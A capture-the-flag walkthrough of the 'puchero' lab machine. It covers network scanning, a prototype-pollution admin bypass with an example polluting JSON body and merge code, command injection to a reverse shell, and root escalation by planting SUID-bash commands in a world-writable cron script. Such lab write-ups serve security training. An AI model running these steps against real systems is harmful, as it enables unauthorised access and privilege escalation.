TheHackersLabs-puchero Machine Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Probing

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.154 08:00:27:e4:e8:6b PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:e6:12 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
export ip=192.168.60.154
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.154:22
Open 192.168.60.154:80
Open 192.168.60.154:3333
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 20:42 CST
Initiating ARP Ping Scan at 20:42
Scanning 192.168.60.154 [1 port]
Completed ARP Ping Scan at 20:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:42
Completed Parallel DNS resolution of 1 host. at 20:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:42
Scanning 192.168.60.154 [3 ports]
Discovered open port 22/tcp on 192.168.60.154
Discovered open port 80/tcp on 192.168.60.154
Discovered open port 3333/tcp on 192.168.60.154
Completed SYN Stealth Scan at 20:42, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.154
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-01-16 20:42:09 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3333/tcp open dec-notes syn-ack ttl 64
MAC Address: 08:00:27:E4:E8:6B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Visiting port 80 shows the default Apache page.

Directory scanning turns up nothing useful.

Entry Point

Changing direction, visit port 3333.

It turns out to be a login form.


Prototype Pollution

Logging in with the default account and password admin, there is a feature to download a remote link; I imagine it is something like wget.

But when you submit, it responds "you are not admin".

I guess prototype pollution or something similar is needed to change the admin value.


Sure enough; for details see TheHackersLabs-TheOffice Machine Walkthrough (WP) | Pepster's Blog
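The pollution path above, as an added example that is not the lab's or this post's code: a naive recursive merge of request JSON into a session object writes through the "__proto__" key onto Object.prototype, so an unrelated object later passes an admin check, while the hardened merge rejects the dangerous keys. The request body, object shapes and function names are constructed for illustration.

```javascript
// Keys that must never be walked into when merging untrusted JSON.
const DANGEROUS_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(v) {
  return v !== null && typeof v === "object" && !Array.isArray(v);
}

// Vulnerable: treats "__proto__" like any other key. On an empty target,
// target["__proto__"] resolves to Object.prototype, which then gets written.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: only own keys of the source, dangerous keys skipped, and the
// target slot is re-created unless it is an own plain object already.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (DANGEROUS_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed request body: JSON.parse creates "__proto__" as an own
// property, which is exactly what a merge must refuse to follow.
const POLLUTING_BODY = '{"username":"admin","__proto__":{"admin":true}}';

// Merge the body into a fresh session with the given function, then ask
// whether a brand-new, unrelated object now looks like an admin.
function pollutedAfter(mergeFn) {
  mergeFn({}, JSON.parse(POLLUTING_BODY));
  const unrelated = {};
  const polluted = unrelated.admin === true;
  delete Object.prototype.admin; // restore the global prototype afterwards
  return polluted;
}
```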


Trying submit with my rev.php: it is not parsed, and download just saves it locally on the target.

It was presumably saved under some directory, but the path is unknown.

Testing whether command injection works: I tried nc, but I suspect nc is most likely not installed.

With busybox the reverse shell connects successfully, but for some reason it drops.



Wrapping it in $() does the trick, so bash executes it.


User Privilege Escalation

❯ pwncat-cs -lp 4444
[21:25:39] Welcome to pwncat 🐈! __main__.py:164
[21:26:10] received connection from 192.168.60.154:52816 bind.py:84
[21:26:10] 0.0.0.0:4444: normalizing shell path manager.py:957
0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[21:26:11] 192.168.60.154:52816: registered new host w/ db manager.py:957
(local) pwncat$
(remote) puchero@puchero:/var/www/html/PrototypePollution-Lab/prototypePoluttion$ cat /etc/passwd|grep bin/bash
root:x:0:0:root:/root:/bin/bash
puchero:x:1000:1000::/home/puchero:/bin/bash

The puchero user is found; wait, the shell I got already belongs to this user rather than www-data, which is rather friendly. There is also a script file under /opt.

Grab the user flag first.

(remote) puchero@puchero:/tmp$ cd ~
(remote) puchero@puchero:/home/puchero$ cat user.txt
7af5b2ba4805dbee057ea57dd5b1d089
(remote) puchero@puchero:/home$ cd /opt/
(remote) puchero@puchero:/opt$ ls
grasioso.sh

Root Privilege Escalation

Guessing it may run on a schedule, upload pspy64 to take a look.

2025/01/16 14:31:01 CMD: UID=0     PID=1289   | /bin/sh -c /bin/bash -c /opt/grasioso.sh

I checked the file permissions: 777. That settles it; just modify the file.

(remote) puchero@puchero:/opt$ ls -al
total 8
drwxr-xr-x 2 root root 4096 may 22 2024 .
drwxr-xr-x 18 root root 4096 abr 12 2024 ..
-rwxrwxrwx 1 root puchero 0 may 22 2024 grasioso.sh
(remote) puchero@puchero:/opt$ echo -e "cp /bin/bash /tmp/sh\nchmod +s /tmp/sh">grasioso.sh
(remote) puchero@puchero:/opt$ cat grasioso.sh
cp /bin/bash /tmp/sh
chmod +s /tmp/sh
(remote) puchero@puchero:/tmp$ ./sh -p
(remote) root@puchero:/tmp# whoami
root
(remote) root@puchero:/tmp# cat /root/root.txt
bdf8c3a56b3c61670c093a8bff406f6e